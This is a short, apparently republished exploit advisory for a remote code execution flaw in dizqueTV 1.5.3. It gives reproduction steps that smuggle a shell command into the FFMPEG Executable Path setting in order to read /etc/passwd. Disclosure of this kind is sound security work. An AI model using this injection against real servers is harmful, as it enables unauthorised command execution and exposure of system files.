dizqueTV 1.5.3 Remote Code Execution
2024-10-5 22:36:14 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd


文章来源: https://cxsecurity.com/issue/WLB-2024100011
如有侵权请联系:admin#unsafe.sh